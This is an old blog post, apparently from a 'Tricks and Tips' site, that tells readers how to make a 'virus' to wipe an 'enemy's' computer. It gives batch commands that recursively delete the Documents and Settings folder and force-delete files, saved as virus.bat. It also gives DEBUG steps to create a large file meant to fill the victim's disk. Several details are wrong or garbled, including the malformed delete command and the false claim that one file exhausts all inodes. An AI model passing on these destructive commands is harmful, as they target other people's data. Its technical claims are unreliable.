Tuesday 3 May 2011

CREATE A VIRUS TO DELETE DATA FROM ANY COMPUTER

(1) Open notepad and type rmdir C:\\documents and settings /S /Q save it as virus.bat :)you can put any folder name instead of \"Documents and settings\" if you are familiar with your enemy`s data place.

(2) delete all files from hard disk. Open notepad and type DEL /F /Q* save it as delete command. This will wash everythings on Hard disk so be carefull.

(3) Create A Huge File Virus, who will block every things to your enemy`s hard disk. You can create a file of any size using nothing more than what's supplied with Windows. Start by converting the desired file size into hexadecimal notation. You can use the Windows Calculator in Scientific mode do to this. Suppose you want a file of 1 million bytes. Enter 1000000 in the calculator and click on the Hex option to convert it (1 million in hex is F4240.) Pad the result with zeroes at the left until the file size reaches eight digits—000F4240. Now open a command prompt window. In Windows 95, 98, or Me, you can do this by entering COMMAND in the Start menu's Run dialog; in Windows NT 4.0, 2000, or XP enter CMD instead. Enter the command DEBUG BIGFILE.DAT and ignore the File not found message. Type RCX and press Enter. Debug will display a colon prompt. Enter the last four digits of the hexadecimal number you calculated (4240, in our example). Type RBX and press Enter, then enter the first four digits of the hexadecimal size (000F, in our example) and press Enter. Enter W for Write and Q for Quit. You've just created a 1-million-byte file using Debug. Of course you can create a file of any desired size using the same technique. This huge file will cover all inod from the hard disk and your enemy will not be able to write any thing on the hard disk.

Subscribe to this Blog via Email:

Click here to Subscribe to FREE email updates from "Tricks and Tips", so that you do not miss out anything that can be valuable to you and your blog!!

0 comments:

Post a Comment